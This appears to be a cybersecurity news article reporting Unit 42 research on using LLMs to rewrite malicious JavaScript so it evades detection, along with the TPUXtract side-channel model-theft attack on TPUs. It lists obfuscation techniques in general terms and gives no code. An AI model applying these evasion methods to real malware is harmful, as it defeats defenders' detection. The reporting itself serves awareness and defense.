Cyber security news for all

More

    AI Capable of Generating 10,000 Distinct Malware Variants, Evading Detection in 88% of Cases

    Cybersecurity experts have unearthed a disturbing capability within large language models (LLMs): the ability to mass-produce transformed iterations of malicious JavaScript code that deftly elude detection mechanisms.

    “While LLMs may falter at crafting malware from the ground up, cybercriminals are leveraging these systems to obfuscate and refine existing malicious scripts, making detection exponentially more difficult,” stated researchers at Palo Alto Networks’ Unit 42 in their latest report. “The linguistic transformations enabled by LLMs are markedly sophisticated, rendering the malicious code indistinguishable from legitimate scripts.”

    This iterative obfuscation technique, over time, has the insidious potential to degrade the efficacy of malware detection algorithms, coaxing them into misclassifying malicious scripts as harmless.

    Despite the bolstered safeguards implemented by LLM providers to deter misuse, malicious actors are employing tools like WormGPT to automate phishing campaigns tailored to specific victims and to develop unique strains of malware. In October 2024, OpenAI revealed it had thwarted over 20 covert operations that sought to exploit its platform for reconnaissance, vulnerability testing, script generation, and debugging assistance.

    Unit 42 demonstrated how LLMs can systematically rewrite existing malware samples, effectively sidestepping machine learning-based detection models such as Innocent Until Proven Guilty (IUPG) and PhishingJS. This methodology facilitated the creation of 10,000 distinct JavaScript variants while preserving their original malicious intent.

    Obfuscation Techniques That Fuel Malware Proliferation

    The adversarial rewriting process employs several sophisticated methods, including:

    • Renaming variables to obscure their original purpose.
    • Splitting strings to hinder recognition.
    • Injecting superfluous “junk” code to camouflage malicious segments.
    • Eliminating redundant whitespace for added stealth.
    • Reconstructing code entirely to simulate authenticity.

    These transformations yield variants that maintain the original functionality but significantly diminish their detectability. According to Unit 42, these rewrites altered the verdict of their own malware classifier from “malicious” to “benign” in an alarming 88% of instances.

    Even more troubling, these reformulated JavaScript artifacts successfully evaded scrutiny by other malware detection platforms, including VirusTotal.

    Natural-Looking Code as a Cloaking Mechanism

    A unique advantage of LLM-enabled obfuscation is the “naturalness” of the resulting code. Unlike libraries such as obfuscator.io, which often produce detectable and formulaic patterns, LLM-generated rewrites mimic genuine coding styles, making them harder to flag or fingerprint.

    “The scalability of generating new malicious code variants increases dramatically with generative AI,” the researchers noted. “However, these same tactics can also be harnessed to generate robust datasets for training detection systems to better counteract such threats.”

    Emerging Threats: Model Theft via TPUXtract

    In parallel, academics from North Carolina State University have unveiled TPUXtract, a side-channel attack capable of conducting model-theft operations against Google’s Tensor Processing Units (TPUs) with a staggering 99.91% precision. This technique poses significant risks, including intellectual property exfiltration and cascading cyberattacks.

    By capturing electromagnetic emissions during neural network computations, TPUXtract gleans sensitive hyperparameters such as:

    • Layer types and configurations.
    • Number of nodes and filters.
    • Kernel dimensions and activation functions.

    This sophisticated black-box approach enables adversaries to reconstruct a functional replica—or close approximation—of the target AI model. However, executing such an attack necessitates physical proximity to the TPU device and access to costly hardware to analyze the signals.

    “We successfully extracted the architectural blueprints and recreated high-level features of the AI,” stated Aydin Aysu, one of the study’s authors. “Using this intelligence, we reproduced an operational surrogate model that closely mirrors the original.”

    Implications for the Future

    As LLMs and advanced computational systems continue to evolve, their dual-use capabilities pose profound challenges to cybersecurity frameworks. While these tools unlock transformative potential in legitimate domains, they simultaneously empower malicious actors to innovate new vectors of attack, necessitating a commensurate evolution in defensive technologies.

    Recent Articles

    Related Stories